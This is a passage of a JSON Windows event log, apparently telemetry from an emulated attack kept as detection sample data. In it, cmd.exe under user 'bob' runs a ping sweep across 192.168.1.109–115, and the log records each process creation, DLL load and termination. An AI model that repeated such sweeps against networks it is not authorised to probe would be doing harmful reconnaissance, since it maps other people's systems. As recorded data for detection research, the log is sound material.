131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "process", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572511830000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.109", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3052, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "process", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572516840000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.110", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1752, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "process", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572521990000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.111", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5964, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572522130000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "process", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572526830000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.112", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4408, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "process", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572531840000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.113", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7504, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572531980000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "process", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572536990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.114", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7652, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "process", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572541830000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.115", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7872, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572541980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": 